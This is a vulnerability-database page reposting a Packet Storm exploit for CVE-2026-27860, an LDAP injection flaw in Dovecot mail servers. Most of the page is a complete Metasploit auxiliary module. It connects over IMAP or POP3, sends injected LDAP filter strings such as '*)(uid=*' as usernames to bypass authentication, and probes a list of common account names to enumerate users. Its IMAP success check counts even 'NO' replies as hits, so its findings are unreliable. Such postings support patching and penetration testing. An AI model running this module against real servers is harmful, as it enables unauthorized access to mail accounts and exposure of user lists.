Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Dovecot 3.1.0 Authentication Bypass / User Enumeration

🗓️ 22 Apr 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 63 Views

Dovecot 3.1.0 LDAP injection vulnerability allows authentication bypass or user enumeration.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-27860
27 Mar 202608:10
attackerkb
AlpineLinux		CVE-2026-27860
27 Mar 202608:10
alpinelinux
Circl		CVE-2026-27860
27 Mar 202612:32
circl
CNNVD		Open-Xchange OX Dovecot Pro 安全漏洞
27 Mar 202600:00
cnnvd
CVE		CVE-2026-27860
27 Mar 202608:10
cve
Cvelist		CVE-2026-27860
27 Mar 202608:10
cvelist
Debian		[SECURITY] [DSA 6197-1] dovecot security update
5 Apr 202615:22
debian
Debian CVE		CVE-2026-27860
27 Mar 202608:10
debiancve
Tenable Nessus		Debian dsa-6197 : dovecot-auth-lua - security update
5 Apr 202600:00
nessus
Tenable Nessus		openSUSE 16 Security Update : dovecot24 (openSUSE-SU-2026:20554-1)
22 Apr 202600:00
nessus
Rows per page
==================================================================================================================================
    | # Title     : Dovecot 3.1.0 LDAP Injection Authentication Bypass                                                               |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets a LDAP injection vulnerability in Dovecot mail servers that can lead to authentication bypass or user enumeration via IMAP/POP3.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Report
      include Msf::Exploit::Remote::Tcp
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot LDAP Injection Authentication Bypass',
            'Description' => %q{
              Dovecot LDAP injection vulnerability.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2026-27860']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(143),
          OptString.new('USERNAME', [false, 'Username', '']),
          OptString.new('LDAP_FILTER', [false, 'LDAP filter', '']),
          OptEnum.new('PROTOCOL', [true, 'Protocol', 'IMAP', ['IMAP', 'POP3']])
        ])
      end
    
      def run_host(ip)
        print_status("Dovecot LDAP Injection CVE-2026-27860")
        print_status("Target: #{ip}:#{rport}")
    
        if datastore['USERNAME'].to_s.strip.empty?
          enumerate_users
        else
          test_ldap_injection
        end
      end
    
      def enumerate_users
        print_status("Enumerating users...")
    
        common_users = ['admin', 'root', 'postmaster', 'webmaster', 'test', 'user']
    
        common_users.each do |user|
          payload = "#{user})(|(uid=*"
          vprint_status("Testing: #{user}")
    
          if test_auth(payload)
            print_good("User found: #{user}")
            report_user(user)
          end
    
          sleep(0.5)
        end
      end
    
      def test_ldap_injection
        ldap_payload = datastore['LDAP_FILTER'].to_s.empty? ? "*)(uid=*" : datastore['LDAP_FILTER']
    
        username = datastore['USERNAME']
        test_username = "#{username})(#{ldap_payload}"
    
        print_status("Testing injection: #{test_username}")
    
        if test_auth(test_username)
          print_good("LDAP injection possible for: #{username}")
          report_ldap_vulnerability
        else
          print_error("No LDAP injection detected")
        end
      end
    
      def test_auth(username)
        sock = nil
    
        begin
          sock = connect
          banner = sock.get_once
          vprint_status("Banner: #{banner}")
    
          if datastore['PROTOCOL'] == 'IMAP'
            sock.put("a1 LOGIN \"#{username}\" \"test\"\r\n")
            response = sock.get_once
    
            vprint_status("Response: #{response}")
    
            return true if response && (
              response.include?('OK') ||
              response.include?('NO') ||
              response.include?('LDAP') ||
              response.include?('search')
            )
          else
            sock.put("USER #{username}\r\n")
            response = sock.get_once
    
            if response && response.include?('+OK')
              sock.put("PASS test\r\n")
              final = sock.get_once
              return true if final && final.include?('+OK')
            end
          end
    
        rescue => e
          vprint_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end
    
        false
      end
    
      def report_user(username)
        report_note(
          host: rhost,
          port: rport,
          type: 'dovecot.ldap.user',
          data: { username: username }
        )
      end
    
      def report_ldap_vulnerability
        report_note(
          host: rhost,
          port: rport,
          type: 'dovecot.ldap.injection',
          data: {
            vulnerable: true,
            payload: datastore['LDAP_FILTER']
          }
        )
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.13.7 - 5.3
EPSS0.00039
SSVC
Dovecotdirectory services protocolauthentication bypassuser enumerationmail servers
63